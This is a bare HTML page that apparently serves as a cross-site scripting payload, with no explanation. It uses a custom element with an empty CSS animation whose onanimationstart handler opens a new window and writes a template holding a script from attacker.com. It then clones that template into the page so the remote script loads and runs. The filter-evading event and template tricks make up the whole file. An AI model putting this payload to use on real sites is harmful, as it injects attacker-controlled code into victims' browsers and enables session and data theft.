<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<style>@keyframes GGGGGhduPrGGGGG{}</style>
<xss style=animation-name:GGGGGhduPrGGGGG onanimationstart="w=window.open('about:blank'); w.document.write('<template id=GGGhduPrGGG><script src=https://attacker.com/static/static.js><\/script><\/template><script>document.body.appendChild(GGGhduPrGGG.content.cloneNode(true));<\/script>');"></xss>
</body>
</html>
